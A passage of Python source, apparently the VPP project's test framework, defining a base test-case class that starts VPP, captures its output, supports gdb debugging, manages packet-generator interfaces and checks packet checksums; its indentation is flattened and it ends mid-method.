import hook as hookmodule
from vpp_pg_interface import VppPGInterface
from vpp_sub_interface import VppSubInterface
from vpp_lo_interface import VppLoInterface
from vpp_bvi_interface import VppBviInterface
from vpp_papi_provider import VppPapiProvider
import vpp_papi
from vpp_papi.vpp_stats import VPPStats
from vpp_papi.vpp_transport_socket import VppTransportSocketIOError
from log import RED, GREEN, YELLOW, double_line_delim, single_line_delim, \
get_logger, colorize
from vpp_object import VppObjectRegistry
from util import ppp, is_core_present
from scapy.layers.inet import IPerror, TCPerror, UDPerror, ICMPerror
from scapy.layers.inet6 import ICMPv6DestUnreach, ICMPv6EchoRequest
from scapy.layers.inet6 import ICMPv6EchoReply
logger = logging.getLogger(__name__)
# Set up an empty logger for the testcase that can be overridden as necessary
null_logger = logging.getLogger('VppTestCase')
null_logger.addHandler(logging.NullHandler())
PASS = 0
FAIL = 1
ERROR = 2
SKIP = 3
TEST_RUN = 4
class BoolEnvironmentVariable(object):
def __init__(self, env_var_name, default='n', true_values=None):
self.name = env_var_name
self.default = default
self.true_values = true_values if true_values is not None else \
("y", "yes", "1")
def __bool__(self):
return os.getenv(self.name, self.default).lower() in self.true_values
if sys.version_info[0] == 2:
__nonzero__ = __bool__
def __repr__(self):
return 'BoolEnvironmentVariable(%r, default=%r, true_values=%r)' % \
(self.name, self.default, self.true_values)
debug_framework = BoolEnvironmentVariable('TEST_DEBUG')
if debug_framework:
import debug_internal
"""
Test framework module.
The module provides a set of tools for constructing and running tests and
representing the results.
"""
class VppDiedError(Exception):
""" exception for reporting that the subprocess has died."""
signals_by_value = {v: k for k, v in signal.__dict__.items() if
k.startswith('SIG') and not k.startswith('SIG_')}
def __init__(self, rv=None, testcase=None, method_name=None):
self.rv = rv
self.signal_name = None
self.testcase = testcase
self.method_name = method_name
try:
self.signal_name = VppDiedError.signals_by_value[-rv]
except (KeyError, TypeError):
pass
if testcase is None and method_name is None:
in_msg = ''
else:
in_msg = ' while running %s.%s' % (testcase, method_name)
if self.rv:
msg = "VPP subprocess died unexpectedly%s with return code: %d%s."\
% (in_msg, self.rv, ' [%s]' %
(self.signal_name if
self.signal_name is not None else ''))
else:
msg = "VPP subprocess died unexpectedly%s." % in_msg
super(VppDiedError, self).__init__(msg)
class _PacketInfo(object):
"""Private class to create packet info object.
Help process information about the next packet.
Set variables to default values.
"""
#: Store the index of the packet.
index = -1
#: Store the index of the source packet generator interface of the packet.
src = -1
#: Store the index of the destination packet generator interface
#: of the packet.
dst = -1
#: Store expected ip version
ip = -1
#: Store expected upper protocol
proto = -1
#: Store the copy of the former packet.
data = None
def __eq__(self, other):
index = self.index == other.index
src = self.src == other.src
dst = self.dst == other.dst
data = self.data == other.data
return index and src and dst and data
def pump_output(testclass):
""" pump output from vpp stdout/stderr to proper queues """
stdout_fragment = ""
stderr_fragment = ""
while not testclass.pump_thread_stop_flag.is_set():
readable = select.select([testclass.vpp.stdout.fileno(),
testclass.vpp.stderr.fileno(),
testclass.pump_thread_wakeup_pipe[0]],
[], [])[0]
if testclass.vpp.stdout.fileno() in readable:
read = os.read(testclass.vpp.stdout.fileno(), 102400)
if len(read) > 0:
split = read.decode('ascii',
errors='backslashreplace').splitlines(True)
if len(stdout_fragment) > 0:
split[0] = "%s%s" % (stdout_fragment, split[0])
if len(split) > 0 and split[-1].endswith("\n"):
limit = None
else:
limit = -1
stdout_fragment = split[-1]
testclass.vpp_stdout_deque.extend(split[:limit])
if not testclass.cache_vpp_output:
for line in split[:limit]:
testclass.logger.info(
"VPP STDOUT: %s" % line.rstrip("\n"))
if testclass.vpp.stderr.fileno() in readable:
read = os.read(testclass.vpp.stderr.fileno(), 102400)
if len(read) > 0:
split = read.decode('ascii',
errors='backslashreplace').splitlines(True)
if len(stderr_fragment) > 0:
split[0] = "%s%s" % (stderr_fragment, split[0])
if len(split) > 0 and split[-1].endswith("\n"):
limit = None
else:
limit = -1
stderr_fragment = split[-1]
testclass.vpp_stderr_deque.extend(split[:limit])
if not testclass.cache_vpp_output:
for line in split[:limit]:
testclass.logger.error(
"VPP STDERR: %s" % line.rstrip("\n"))
# ignoring the dummy pipe here intentionally - the
# flag will take care of properly terminating the loop
def _is_skip_aarch64_set():
return BoolEnvironmentVariable('SKIP_AARCH64')
is_skip_aarch64_set = _is_skip_aarch64_set()
def _is_platform_aarch64():
return platform.machine() == 'aarch64'
is_platform_aarch64 = _is_platform_aarch64()
def _running_extended_tests():
return BoolEnvironmentVariable("EXTENDED_TESTS")
running_extended_tests = _running_extended_tests()
def _running_gcov_tests():
return BoolEnvironmentVariable("GCOV_TESTS")
running_gcov_tests = _running_gcov_tests()
class KeepAliveReporter(object):
"""
Singleton object which reports test start to parent process
"""
_shared_state = {}
def __init__(self):
self.__dict__ = self._shared_state
self._pipe = None
@property
def pipe(self):
return self._pipe
@pipe.setter
def pipe(self, pipe):
if self._pipe is not None:
raise Exception("Internal error - pipe should only be set once.")
self._pipe = pipe
def send_keep_alive(self, test, desc=None):
"""
Write current test tmpdir & desc to keep-alive pipe to signal liveness
"""
if self.pipe is None:
# if not running forked..
return
if isclass(test):
desc = '%s (%s)' % (desc, unittest.util.strclass(test))
else:
desc = test.id()
self.pipe.send((desc, test.vpp_bin, test.tempdir, test.vpp.pid))
class TestCaseTag(Enum):
# marks the suites that must run at the end
# using only a single test runner
RUN_SOLO = 1
# marks the suites broken on VPP multi-worker
FIXME_VPP_WORKERS = 2
def create_tag_decorator(e):
def decorator(cls):
try:
cls.test_tags.append(e)
except AttributeError:
cls.test_tags = [e]
return cls
return decorator
tag_run_solo = create_tag_decorator(TestCaseTag.RUN_SOLO)
tag_fixme_vpp_workers = create_tag_decorator(TestCaseTag.FIXME_VPP_WORKERS)
class VppTestCase(unittest.TestCase):
"""This subclass is a base class for VPP test cases that are implemented as
classes. It provides methods to create and run test case.
"""
extra_vpp_punt_config = []
extra_vpp_plugin_config = []
logger = null_logger
vapi_response_timeout = 5
@property
def packet_infos(self):
"""List of packet infos"""
return self._packet_infos
@classmethod
def get_packet_count_for_if_idx(cls, dst_if_index):
"""Get the number of packet info for specified destination if index"""
if dst_if_index in cls._packet_count_for_dst_if_idx:
return cls._packet_count_for_dst_if_idx[dst_if_index]
else:
return 0
@classmethod
def has_tag(cls, tag):
""" if the test case has a given tag - return true """
try:
return tag in cls.test_tags
except AttributeError:
pass
return False
@classmethod
def is_tagged_run_solo(cls):
""" if the test case class is timing-sensitive - return true """
return cls.has_tag(TestCaseTag.RUN_SOLO)
@classmethod
def instance(cls):
"""Return the instance of this testcase"""
return cls.test_instance
@classmethod
def set_debug_flags(cls, d):
cls.gdbserver_port = 7777
cls.debug_core = False
cls.debug_gdb = False
cls.debug_gdbserver = False
cls.debug_all = False
if d is None:
return
dl = d.lower()
if dl == "core":
cls.debug_core = True
elif dl == "gdb" or dl == "gdb-all":
cls.debug_gdb = True
elif dl == "gdbserver" or dl == "gdbserver-all":
cls.debug_gdbserver = True
else:
raise Exception("Unrecognized DEBUG option: '%s'" % d)
if dl == "gdb-all" or dl == "gdbserver-all":
cls.debug_all = True
@staticmethod
def get_least_used_cpu():
cpu_usage_list = [set(range(psutil.cpu_count()))]
vpp_processes = [p for p in psutil.process_iter(attrs=['pid', 'name'])
if 'vpp_main' == p.info['name']]
for vpp_process in vpp_processes:
for cpu_usage_set in cpu_usage_list:
try:
cpu_num = vpp_process.cpu_num()
if cpu_num in cpu_usage_set:
cpu_usage_set_index = cpu_usage_list.index(
cpu_usage_set)
if cpu_usage_set_index == len(cpu_usage_list) - 1:
cpu_usage_list.append({cpu_num})
else:
cpu_usage_list[cpu_usage_set_index + 1].add(
cpu_num)
cpu_usage_set.remove(cpu_num)
break
except psutil.NoSuchProcess:
pass
for cpu_usage_set in cpu_usage_list:
if len(cpu_usage_set) > 0:
min_usage_set = cpu_usage_set
break
return random.choice(tuple(min_usage_set))
@classmethod
def setUpConstants(cls):
""" Set-up the test case class based on environment variables """
cls.step = BoolEnvironmentVariable('STEP')
d = os.getenv("DEBUG", None)
# inverted case to handle '' == True
c = os.getenv("CACHE_OUTPUT", "1")
cls.cache_vpp_output = False if c.lower() in ("n", "no", "0") else True
cls.set_debug_flags(d)
cls.vpp_bin = os.getenv('VPP_BIN', "vpp")
cls.plugin_path = os.getenv('VPP_PLUGIN_PATH')
cls.test_plugin_path = os.getenv('VPP_TEST_PLUGIN_PATH')
cls.extern_plugin_path = os.getenv('EXTERN_PLUGINS')
plugin_path = None
if cls.plugin_path is not None:
if cls.extern_plugin_path is not None:
plugin_path = "%s:%s" % (
cls.plugin_path, cls.extern_plugin_path)
else:
plugin_path = cls.plugin_path
elif cls.extern_plugin_path is not None:
plugin_path = cls.extern_plugin_path
debug_cli = ""
if cls.step or cls.debug_gdb or cls.debug_gdbserver:
debug_cli = "cli-listen localhost:5002"
coredump_size = None
size = os.getenv("COREDUMP_SIZE")
if size is not None:
coredump_size = "coredump-size %s" % size
if coredump_size is None:
coredump_size = "coredump-size unlimited"
cpu_core_number = cls.get_least_used_cpu()
if not hasattr(cls, "vpp_worker_count"):
cls.vpp_worker_count = 0
worker_config = os.getenv("VPP_WORKER_CONFIG", "")
if worker_config:
elems = worker_config.split(" ")
if elems[0] != "workers" or len(elems) != 2:
raise ValueError("Wrong VPP_WORKER_CONFIG == '%s' value." %
worker_config)
cls.vpp_worker_count = int(elems[1])
if cls.vpp_worker_count > 0 and\
cls.has_tag(TestCaseTag.FIXME_VPP_WORKERS):
cls.vpp_worker_count = 0
default_variant = os.getenv("VARIANT")
if default_variant is not None:
default_variant = "defaults { %s 100 }" % default_variant
else:
default_variant = ""
api_fuzzing = os.getenv("API_FUZZ")
if api_fuzzing is None:
api_fuzzing = 'off'
cls.vpp_cmdline = [
cls.vpp_bin,
"unix", "{", "nodaemon", debug_cli, "full-coredump",
coredump_size, "runtime-dir", cls.tempdir, "}",
"api-trace", "{", "on", "}",
"api-segment", "{", "prefix", cls.shm_prefix, "}",
"cpu", "{", "main-core", str(cpu_core_number), ]
if cls.vpp_worker_count:
cls.vpp_cmdline.extend(["workers", str(cls.vpp_worker_count)])
cls.vpp_cmdline.extend([
"}",
"physmem", "{", "max-size", "32m", "}",
"statseg", "{", "socket-name", cls.stats_sock, "}",
"socksvr", "{", "socket-name", cls.api_sock, "}",
"node { ", default_variant, "}",
"api-fuzz {", api_fuzzing, "}",
"plugins", "{", "plugin", "dpdk_plugin.so", "{", "disable", "}",
"plugin", "rdma_plugin.so", "{", "disable", "}",
"plugin", "lisp_unittest_plugin.so", "{", "enable", "}",
"plugin", "unittest_plugin.so", "{", "enable", "}"
] + cls.extra_vpp_plugin_config + ["}", ])
if cls.extra_vpp_punt_config is not None:
cls.vpp_cmdline.extend(cls.extra_vpp_punt_config)
if plugin_path is not None:
cls.vpp_cmdline.extend(["plugin_path", plugin_path])
if cls.test_plugin_path is not None:
cls.vpp_cmdline.extend(["test_plugin_path", cls.test_plugin_path])
cls.logger.info("vpp_cmdline args: %s" % cls.vpp_cmdline)
cls.logger.info("vpp_cmdline: %s" % " ".join(cls.vpp_cmdline))
@classmethod
def wait_for_enter(cls):
if cls.debug_gdbserver:
print(double_line_delim)
print("Spawned GDB server with PID: %d" % cls.vpp.pid)
elif cls.debug_gdb:
print(double_line_delim)
print("Spawned VPP with PID: %d" % cls.vpp.pid)
else:
cls.logger.debug("Spawned VPP with PID: %d" % cls.vpp.pid)
return
print(single_line_delim)
print("You can debug VPP using:")
if cls.debug_gdbserver:
print("sudo gdb " + cls.vpp_bin +
" -ex 'target remote localhost:{port}'"
.format(port=cls.gdbserver_port))
print("Now is the time to attach gdb by running the above "
"command, set up breakpoints etc., then resume VPP from "
"within gdb by issuing the 'continue' command")
cls.gdbserver_port += 1
elif cls.debug_gdb:
print("sudo gdb " + cls.vpp_bin + " -ex 'attach %s'" % cls.vpp.pid)
print("Now is the time to attach gdb by running the above "
"command and set up breakpoints etc., then resume VPP from"
" within gdb by issuing the 'continue' command")
print(single_line_delim)
input("Press ENTER to continue running the testcase...")
@classmethod
def run_vpp(cls):
cmdline = cls.vpp_cmdline
if cls.debug_gdbserver:
gdbserver = '/usr/bin/gdbserver'
if not os.path.isfile(gdbserver) or \
not os.access(gdbserver, os.X_OK):
raise Exception("gdbserver binary '%s' does not exist or is "
"not executable" % gdbserver)
cmdline = [gdbserver, 'localhost:{port}'
.format(port=cls.gdbserver_port)] + cls.vpp_cmdline
cls.logger.info("Gdbserver cmdline is %s", " ".join(cmdline))
try:
cls.vpp = subprocess.Popen(cmdline,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except subprocess.CalledProcessError as e:
cls.logger.critical("Subprocess returned with non-0 return code: ("
"%s)", e.returncode)
raise
except OSError as e:
cls.logger.critical("Subprocess returned with OS error: "
"(%s) %s", e.errno, e.strerror)
raise
except Exception as e:
cls.logger.exception("Subprocess returned unexpected from "
"%s:", cmdline)
raise
cls.wait_for_enter()
@classmethod
def wait_for_coredump(cls):
corefile = cls.tempdir + "/core"
if os.path.isfile(corefile):
cls.logger.error("Waiting for coredump to complete: %s", corefile)
curr_size = os.path.getsize(corefile)
deadline = time.time() + 60
ok = False
while time.time() < deadline:
cls.sleep(1)
size = curr_size
curr_size = os.path.getsize(corefile)
if size == curr_size:
ok = True
break
if not ok:
cls.logger.error("Timed out waiting for coredump to complete:"
" %s", corefile)
else:
cls.logger.error("Coredump complete: %s, size %d",
corefile, curr_size)
@classmethod
def setUpClass(cls):
"""
Perform class setup before running the testcase
Remove shared memory files, start vpp and connect the vpp-api
"""
super(VppTestCase, cls).setUpClass()
gc.collect() # run garbage collection first
cls.logger = get_logger(cls.__name__)
seed = os.environ["RND_SEED"]
random.seed(seed)
if hasattr(cls, 'parallel_handler'):
cls.logger.addHandler(cls.parallel_handler)
cls.logger.propagate = False
cls.tempdir = tempfile.mkdtemp(
prefix='vpp-unittest-%s-' % cls.__name__)
cls.stats_sock = "%s/stats.sock" % cls.tempdir
cls.api_sock = "%s/api.sock" % cls.tempdir
cls.file_handler = FileHandler("%s/log.txt" % cls.tempdir)
cls.file_handler.setFormatter(
Formatter(fmt='%(asctime)s,%(msecs)03d %(message)s',
datefmt="%H:%M:%S"))
cls.file_handler.setLevel(DEBUG)
cls.logger.addHandler(cls.file_handler)
cls.logger.debug("--- setUpClass() for %s called ---" %
cls.__name__)
cls.shm_prefix = os.path.basename(cls.tempdir) # Only used for VAPI
os.chdir(cls.tempdir)
cls.logger.info("Temporary dir is %s, api socket is %s",
cls.tempdir, cls.api_sock)
cls.logger.debug("Random seed is %s" % seed)
cls.setUpConstants()
cls.reset_packet_infos()
cls._captures = []
cls._old_captures = []
cls.verbose = 0
cls.vpp_dead = False
cls.registry = VppObjectRegistry()
cls.vpp_startup_failed = False
cls.reporter = KeepAliveReporter()
# need to catch exceptions here because if we raise, then the cleanup
# doesn't get called and we might end with a zombie vpp
try:
cls.run_vpp()
cls.reporter.send_keep_alive(cls, 'setUpClass')
VppTestResult.current_test_case_info = TestCaseInfo(
cls.logger, cls.tempdir, cls.vpp.pid, cls.vpp_bin)
cls.vpp_stdout_deque = deque()
cls.vpp_stderr_deque = deque()
cls.pump_thread_stop_flag = Event()
cls.pump_thread_wakeup_pipe = os.pipe()
cls.pump_thread = Thread(target=pump_output, args=(cls,))
cls.pump_thread.daemon = True
cls.pump_thread.start()
if cls.debug_gdb or cls.debug_gdbserver:
cls.vapi_response_timeout = 0
cls.vapi = VppPapiProvider(cls.__name__, cls,
cls.vapi_response_timeout)
if cls.step:
hook = hookmodule.StepHook(cls)
else:
hook = hookmodule.PollHook(cls)
cls.vapi.register_hook(hook)
cls.statistics = VPPStats(socketname=cls.stats_sock)
try:
hook.poll_vpp()
except VppDiedError:
cls.vpp_startup_failed = True
cls.logger.critical(
"VPP died shortly after startup, check the"
" output to standard error for possible cause")
raise
try:
cls.vapi.connect()
except (vpp_papi.VPPIOError, Exception) as e:
cls.logger.debug("Exception connecting to vapi: %s" % e)
cls.vapi.disconnect()
if cls.debug_gdbserver:
print(colorize("You're running VPP inside gdbserver but "
"VPP-API connection failed, did you forget "
"to 'continue' VPP from within gdb?", RED))
raise e
except vpp_papi.VPPRuntimeError as e:
cls.logger.debug("%s" % e)
cls.quit()
raise e
except Exception as e:
cls.logger.debug("Exception connecting to VPP: %s" % e)
cls.quit()
raise e
@classmethod
def _debug_quit(cls):
if (cls.debug_gdbserver or cls.debug_gdb):
try:
cls.vpp.poll()
if cls.vpp.returncode is None:
print()
print(double_line_delim)
print("VPP or GDB server is still running")
print(single_line_delim)
input("When done debugging, press ENTER to kill the "
"process and finish running the testcase...")
except AttributeError:
pass
@classmethod
def quit(cls):
"""
Disconnect vpp-api, kill vpp and cleanup shared memory files
"""
cls._debug_quit()
# first signal that we want to stop the pump thread, then wake it up
if hasattr(cls, 'pump_thread_stop_flag'):
cls.pump_thread_stop_flag.set()
if hasattr(cls, 'pump_thread_wakeup_pipe'):
os.write(cls.pump_thread_wakeup_pipe[1], b'ding dong wake up')
if hasattr(cls, 'pump_thread'):
cls.logger.debug("Waiting for pump thread to stop")
cls.pump_thread.join()
if hasattr(cls, 'vpp_stderr_reader_thread'):
cls.logger.debug("Waiting for stderr pump to stop")
cls.vpp_stderr_reader_thread.join()
if hasattr(cls, 'vpp'):
if hasattr(cls, 'vapi'):
cls.logger.debug(cls.vapi.vpp.get_stats())
cls.logger.debug("Disconnecting class vapi client on %s",
cls.__name__)
cls.vapi.disconnect()
cls.logger.debug("Deleting class vapi attribute on %s",
cls.__name__)
del cls.vapi
cls.vpp.poll()
if cls.vpp.returncode is None:
cls.wait_for_coredump()
cls.logger.debug("Sending TERM to vpp")
cls.vpp.terminate()
cls.logger.debug("Waiting for vpp to die")
try:
outs, errs = cls.vpp.communicate(timeout=5)
except subprocess.TimeoutExpired:
cls.vpp.kill()
outs, errs = cls.vpp.communicate()
cls.logger.debug("Deleting class vpp attribute on %s",
cls.__name__)
cls.vpp.stdout.close()
cls.vpp.stderr.close()
del cls.vpp
if cls.vpp_startup_failed:
stdout_log = cls.logger.info
stderr_log = cls.logger.critical
else:
stdout_log = cls.logger.info
stderr_log = cls.logger.info
if hasattr(cls, 'vpp_stdout_deque'):
stdout_log(single_line_delim)
stdout_log('VPP output to stdout while running %s:', cls.__name__)
stdout_log(single_line_delim)
vpp_output = "".join(cls.vpp_stdout_deque)
with open(cls.tempdir + '/vpp_stdout.txt', 'w') as f:
f.write(vpp_output)
stdout_log('\n%s', vpp_output)
stdout_log(single_line_delim)
if hasattr(cls, 'vpp_stderr_deque'):
stderr_log(single_line_delim)
stderr_log('VPP output to stderr while running %s:', cls.__name__)
stderr_log(single_line_delim)
vpp_output = "".join(cls.vpp_stderr_deque)
with open(cls.tempdir + '/vpp_stderr.txt', 'w') as f:
f.write(vpp_output)
stderr_log('\n%s', vpp_output)
stderr_log(single_line_delim)
@classmethod
def tearDownClass(cls):
""" Perform final cleanup after running all tests in this test-case """
cls.logger.debug("--- tearDownClass() for %s called ---" %
cls.__name__)
cls.reporter.send_keep_alive(cls, 'tearDownClass')
cls.quit()
cls.file_handler.close()
cls.reset_packet_infos()
if debug_framework:
debug_internal.on_tear_down_class(cls)
def show_commands_at_teardown(self):
""" Allow subclass specific teardown logging additions."""
self.logger.info("--- No test specific show commands provided. ---")
def tearDown(self):
""" Show various debug prints after each test """
self.logger.debug("--- tearDown() for %s.%s(%s) called ---" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
try:
if not self.vpp_dead:
self.logger.debug(self.vapi.cli("show trace max 1000"))
self.logger.info(self.vapi.ppcli("show interface"))
self.logger.info(self.vapi.ppcli("show hardware"))
self.logger.info(self.statistics.set_errors_str())
self.logger.info(self.vapi.ppcli("show run"))
self.logger.info(self.vapi.ppcli("show log"))
self.logger.info(self.vapi.ppcli("show bihash"))
self.logger.info("Logging testcase specific show commands.")
self.show_commands_at_teardown()
self.registry.remove_vpp_config(self.logger)
# Save/Dump VPP api trace log
m = self._testMethodName
api_trace = "vpp_api_trace.%s.%d.log" % (m, self.vpp.pid)
tmp_api_trace = "/tmp/%s" % api_trace
vpp_api_trace_log = "%s/%s" % (self.tempdir, api_trace)
self.logger.info(self.vapi.ppcli("api trace save %s" % api_trace))
self.logger.info("Moving %s to %s\n" % (tmp_api_trace,
vpp_api_trace_log))
os.rename(tmp_api_trace, vpp_api_trace_log)
self.logger.info(self.vapi.ppcli("api trace custom-dump %s" %
vpp_api_trace_log))
except VppTransportSocketIOError:
self.logger.debug("VppTransportSocketIOError: Vpp dead. "
"Cannot log show commands.")
self.vpp_dead = True
else:
self.registry.unregister_all(self.logger)
def setUp(self):
""" Clear trace before running each test"""
super(VppTestCase, self).setUp()
self.reporter.send_keep_alive(self)
if self.vpp_dead:
raise VppDiedError(rv=None, testcase=self.__class__.__name__,
method_name=self._testMethodName)
self.sleep(.1, "during setUp")
self.vpp_stdout_deque.append(
"--- test setUp() for %s.%s(%s) starts here ---\n" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
self.vpp_stderr_deque.append(
"--- test setUp() for %s.%s(%s) starts here ---\n" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
self.vapi.cli("clear trace")
# store the test instance inside the test class - so that objects
# holding the class can access instance methods (like assertEqual)
type(self).test_instance = self
@classmethod
def pg_enable_capture(cls, interfaces=None):
"""
Enable capture on packet-generator interfaces
:param interfaces: iterable interface indexes (if None,
use self.pg_interfaces)
"""
if interfaces is None:
interfaces = cls.pg_interfaces
for i in interfaces:
i.enable_capture()
@classmethod
def register_capture(cls, intf, worker):
""" Register a capture in the testclass """
# add to the list of captures with current timestamp
cls._captures.append((intf, worker))
@classmethod
def get_vpp_time(cls):
# processes e.g. "Time now 2.190522, Wed, 11 Mar 2020 17:29:54 GMT"
# returns float("2.190522")
timestr = cls.vapi.cli('show clock')
head, sep, tail = timestr.partition(',')
head, sep, tail = head.partition('Time now')
return float(tail)
@classmethod
def sleep_on_vpp_time(cls, sec):
""" Sleep according to time in VPP world """
# On a busy system with many processes
# we might end up with VPP time being slower than real world
# So take that into account when waiting for VPP to do something
start_time = cls.get_vpp_time()
while cls.get_vpp_time() - start_time < sec:
cls.sleep(0.1)
@classmethod
def pg_start(cls, trace=True):
""" Enable the PG, wait till it is done, then clean up """
for (intf, worker) in cls._old_captures:
intf.rename_previous_capture_file(intf.get_in_path(worker),
intf.in_history_counter)
cls._old_captures = []
if trace:
cls.vapi.cli("clear trace")
cls.vapi.cli("trace add pg-input 1000")
cls.vapi.cli('packet-generator enable')
# PG, when starts, runs to completion -
# so let's avoid a race condition,
# and wait a little till it's done.
# Then clean it up - and then be gone.
deadline = time.time() + 300
while cls.vapi.cli('show packet-generator').find("Yes") != -1:
cls.sleep(0.01) # yield
if time.time() > deadline:
cls.logger.error("Timeout waiting for pg to stop")
break
for intf, worker in cls._captures:
cls.vapi.cli('packet-generator delete %s' %
intf.get_cap_name(worker))
cls._old_captures = cls._captures
cls._captures = []
@classmethod
def create_pg_interfaces(cls, interfaces, gso=0, gso_size=0):
"""
Create packet-generator interfaces.
:param interfaces: iterable indexes of the interfaces.
:returns: List of created interfaces.
"""
result = []
for i in interfaces:
intf = VppPGInterface(cls, i, gso, gso_size)
setattr(cls, intf.name, intf)
result.append(intf)
cls.pg_interfaces = result
return result
@classmethod
def create_loopback_interfaces(cls, count):
"""
Create loopback interfaces.
:param count: number of interfaces created.
:returns: List of created interfaces.
"""
result = [VppLoInterface(cls) for i in range(count)]
for intf in result:
setattr(cls, intf.name, intf)
cls.lo_interfaces = result
return result
@classmethod
def create_bvi_interfaces(cls, count):
"""
Create BVI interfaces.
:param count: number of interfaces created.
:returns: List of created interfaces.
"""
result = [VppBviInterface(cls) for i in range(count)]
for intf in result:
setattr(cls, intf.name, intf)
cls.bvi_interfaces = result
return result
@staticmethod
def extend_packet(packet, size, padding=' '):
"""
Extend packet to given size by padding with spaces or custom padding
NOTE: Currently works only when Raw layer is present.
:param packet: packet
:param size: target size
:param padding: padding used to extend the payload
"""
packet_len = len(packet) + 4
extend = size - packet_len
if extend > 0:
num = (extend // len(padding)) + 1
packet[Raw].load += (padding * num)[:extend].encode("ascii")
@classmethod
def reset_packet_infos(cls):
""" Reset the list of packet info objects and packet counts to zero """
cls._packet_infos = {}
cls._packet_count_for_dst_if_idx = {}
@classmethod
def create_packet_info(cls, src_if, dst_if):
"""
Create packet info object containing the source and destination indexes
and add it to the testcase's packet info list
:param VppInterface src_if: source interface
:param VppInterface dst_if: destination interface
:returns: _PacketInfo object
"""
info = _PacketInfo()
info.index = len(cls._packet_infos)
info.src = src_if.sw_if_index
info.dst = dst_if.sw_if_index
if isinstance(dst_if, VppSubInterface):
dst_idx = dst_if.parent.sw_if_index
else:
dst_idx = dst_if.sw_if_index
if dst_idx in cls._packet_count_for_dst_if_idx:
cls._packet_count_for_dst_if_idx[dst_idx] += 1
else:
cls._packet_count_for_dst_if_idx[dst_idx] = 1
cls._packet_infos[info.index] = info
return info
@staticmethod
def info_to_payload(info):
"""
Convert _PacketInfo object to packet payload
:param info: _PacketInfo object
:returns: string containing serialized data from packet info
"""
return "%d %d %d %d %d" % (info.index, info.src, info.dst,
info.ip, info.proto)
@staticmethod
def payload_to_info(payload, payload_field='load'):
"""
Convert packet payload to _PacketInfo object
:param payload: packet payload
:type payload: <class 'scapy.packet.Raw'>
:param payload_field: packet fieldname of payload "load" for
<class 'scapy.packet.Raw'>
:type payload_field: str
:returns: _PacketInfo object containing de-serialized data from payload
"""
numbers = getattr(payload, payload_field).split()
info = _PacketInfo()
info.index = int(numbers[0])
info.src = int(numbers[1])
info.dst = int(numbers[2])
info.ip = int(numbers[3])
info.proto = int(numbers[4])
return info
def get_next_packet_info(self, info):
"""
Iterate over the packet info list stored in the testcase
Start iteration with first element if info is None
Continue based on index in info if info is specified
:param info: info or None
:returns: next info in list or None if no more infos
"""
if info is None:
next_index = 0
else:
next_index = info.index + 1
if next_index == len(self._packet_infos):
return None
else:
return self._packet_infos[next_index]
def get_next_packet_info_for_interface(self, src_index, info):
"""
Search the packet info list for the next packet info with same source
interface index
:param src_index: source interface index to search for
:param info: packet info - where to start the search
:returns: packet info or None
"""
while True:
info = self.get_next_packet_info(info)
if info is None:
return None
if info.src == src_index:
return info
def get_next_packet_info_for_interface2(self, src_index, dst_index, info):
"""
Search the packet info list for the next packet info with same source
and destination interface indexes
:param src_index: source interface index to search for
:param dst_index: destination interface index to search for
:param info: packet info - where to start the search
:returns: packet info or None
"""
while True:
info = self.get_next_packet_info_for_interface(src_index, info)
if info is None:
return None
if info.dst == dst_index:
return info
def assert_equal(self, real_value, expected_value, name_or_class=None):
if name_or_class is None:
self.assertEqual(real_value, expected_value)
return
try:
msg = "Invalid %s: %d('%s') does not match expected value %d('%s')"
msg = msg % (getdoc(name_or_class).strip(),
real_value, str(name_or_class(real_value)),
expected_value, str(name_or_class(expected_value)))
except Exception:
msg = "Invalid %s: %s does not match expected value %s" % (
name_or_class, real_value, expected_value)
self.assertEqual(real_value, expected_value, msg)
def assert_in_range(self,
real_value,
expected_min,
expected_max,
name=None):
if name is None:
msg = None
else:
msg = "Invalid %s: %s out of range <%s,%s>" % (
name, real_value, expected_min, expected_max)
self.assertTrue(expected_min <= real_value <= expected_max, msg)
def assert_packet_checksums_valid(self, packet,
ignore_zero_udp_checksums=True):
received = packet.__class__(scapy.compat.raw(packet))
udp_layers = ['UDP', 'UDPerror']
checksum_fields = ['cksum', 'chksum']
checksums = []
counter = 0
temp = received.__class__(scapy.compat.raw(received))
while True:
layer = temp.getlayer(counter)
if layer:
layer = layer.copy()
layer.remove_payload()
for cf in checksum_fields:
if hasattr(layer, cf):
if ignore_zero_udp_checksums and \
0 == getattr(layer, cf) and \
layer.name in udp_layers:
continue
delattr(temp.getlayer(counter), cf)
checksums.append((counter, cf))
else:
break
counter = counter + 1
if 0 == len(checksums):
return
temp = temp.__class__(scapy.compat.raw(temp))
for layer, cf in checksums:
calc_sum = getattr(temp[layer], cf)
self.assert_equal(
getattr(received[layer], cf), calc_sum,
"packet checksum on layer #%d: %s" % (layer, temp[layer].name))
self.logger.debug(
"Checksum field `%s` on `%s` layer has correct value `%s`" %
(cf, temp[layer].name, calc_sum))
def assert_checksum_valid(self, received_packet, layer,
field_name='chksum',
ignore_zero_checksum=False):
""" Check checksum of received packet on given layer """
received_packet_checksum = getattr(received_packet[layer], field_name)
if ignore_zero_checksum and 0 == received_packet_checksum:
return
recalculated = received_packet.__class__(
scapy.compat.raw(received_packet))
delattr(recalculated[layer], field_name)
recalculated = recalculated.__class__(scapy.compat.raw(recalculated))
self.assert_equal(received_packet_checksum,
getattr(recalculated[layer], field_name),
"packet checksum on layer: %s" % layer)
def assert_ip_checksum_valid(self, received_packet,
ignore_zero_checksum=False):
self.assert_checksum_valid(received_packet, 'IP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_tcp_checksum_valid(self, received_packet,
ignore_zero_checksum=False):
self.assert_checksum_valid(received_packet, 'TCP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_udp_checksum_valid(self, received_packet,
ignore_zero_checksum=True):
self.assert_checksum_valid(received_packet, 'UDP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_embedded_icmp_checksum_valid(self, received_packet):
if received_packet.haslayer(IPerror):
self.assert_checksum_valid(received_packet, 'IPerror')
if received_packet.haslayer(TCPerror):
self.assert_checksum_valid(received_packet, 'TCPerror')
if received_packet.haslayer(UDPerror):
self.assert_checksum_valid(received_packet, 'UDPerror',
ignore_zero_checksum=True)
if received_packet.haslayer(ICMPerror):
self.assert_checksum_valid(received_packet, 'ICMPerror')
def assert_icmp_checksum_valid(self, received_packet):
